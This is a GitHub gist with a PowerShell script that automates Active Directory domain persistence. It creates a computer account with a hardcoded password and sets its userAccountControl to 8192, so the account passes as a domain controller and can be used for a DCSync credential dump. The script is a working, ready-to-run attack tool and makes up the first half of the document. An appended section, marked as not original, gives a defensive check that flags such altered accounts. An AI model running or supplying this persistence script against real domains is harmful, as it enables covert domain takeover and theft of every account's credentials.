@netbiosX
Created January 17, 2022 11:24
PowerShell script to automate domain persistence via the userAccountControl Active Directory attribute.
function Execute-userAccountControl
{
    [CmdletBinding()]
    param
    (
        [System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
        [System.String]$ComputerName = 'Pentestlab',
        [System.String]$OSVersion = '10.0 (18363)',
        [System.String]$OS = 'Windows 10 Enterprise',
        [System.String]$DNSName = "$ComputerName.$DomainFQDN",
        $MachineAccount = 'Pentestlab'
    )

    # Password assigned to the new computer account.
    $secureString = ConvertTo-SecureString "Password123" -AsPlainText -Force
    $VerbosePreference = "Continue"

    # Create the computer account (requires the ActiveDirectory module).
    Write-Verbose -Message "Creating Computer Account: $ComputerName"
    New-ADComputer $ComputerName -AccountPassword $secureString -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OSVersion -DNSHostName $DNSName -ErrorAction Stop;
    Write-Verbose -Message "$ComputerName created!"

    # 8192 (0x2000) is the SERVER_TRUST_ACCOUNT flag, which marks the account as a domain controller.
    Write-Verbose -Message "Attempting to establish persistence."
    Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192."
    Set-ADComputer $MachineAccount -Replace @{ "userAccountControl" = 8192 };
    Write-Verbose -Message "$MachineAccount is now a Domain Controller!"
    Write-Verbose -Message "Domain persistence established! You can now use the DCSync technique with Pentestlab credentials."
    $VerbosePreference = "Continue"
}
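
A defender's check for the change this script makes, as an added example that is not part of the original gist: it flags computer accounts whose userAccountControl carries the SERVER_TRUST_ACCOUNT bit (8192) but whose names are not on a list of known domain controllers. The function name, the sample objects and the corp.example domain are constructed for illustration.

```powershell
# Added defensive example (not the gist author's code).
function Find-UnexpectedServerTrustAccount {
    [CmdletBinding()]
    param (
        # Computer objects exposing Name, DistinguishedName and userAccountControl.
        [Parameter(Mandatory)] [object[]]$Computer,
        # Allowlist: names of the domain controllers you actually operate.
        [Parameter(Mandatory)] [string[]]$KnownDomainController
    )
    $serverTrustAccount = 0x2000   # 8192, the value the script above writes
    foreach ($c in $Computer) {
        $uac = [int]$c.userAccountControl
        # Bit not set: ordinary workstation or member server account.
        if (($uac -band $serverTrustAccount) -eq 0) { continue }
        $name = ([string]$c.Name).TrimEnd('$')
        # -contains compares strings case-insensitively.
        if ($KnownDomainController -contains $name) { continue }
        [pscustomobject]@{
            Name                  = $name
            userAccountControl    = $uac
            DistinguishedName     = $c.DistinguishedName
            # Genuine DCs normally live in the default Domain Controllers OU.
            InDomainControllersOU = ($c.DistinguishedName -match '(^|,)OU=Domain Controllers,DC=')
        }
    }
}

# Constructed sample data: one real DC, one workstation, one account altered as in the gist.
$sample = @(
    [pscustomobject]@{ Name = 'DC01'; userAccountControl = 532480
        DistinguishedName = 'CN=DC01,OU=Domain Controllers,DC=corp,DC=example' }
    [pscustomobject]@{ Name = 'WS-014'; userAccountControl = 4096
        DistinguishedName = 'CN=WS-014,CN=Computers,DC=corp,DC=example' }
    [pscustomobject]@{ Name = 'Pentestlab'; userAccountControl = 8192
        DistinguishedName = 'CN=Pentestlab,CN=Computers,DC=corp,DC=example' }
)
Find-UnexpectedServerTrustAccount -Computer $sample -KnownDomainController 'DC01'

# Against a live domain (requires the ActiveDirectory module):
#   $dcs  = (Get-ADDomainController -Filter *).Name
#   $hits = Get-ADComputer -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' -Properties userAccountControl
#   Find-UnexpectedServerTrustAccount -Computer $hits -KnownDomainController $dcs
```

Any object returned is a computer account that claims domain controller status without being on the allowlist; the LDAP filter uses the bitwise AND matching rule so it also catches values where 8192 is combined with other flags.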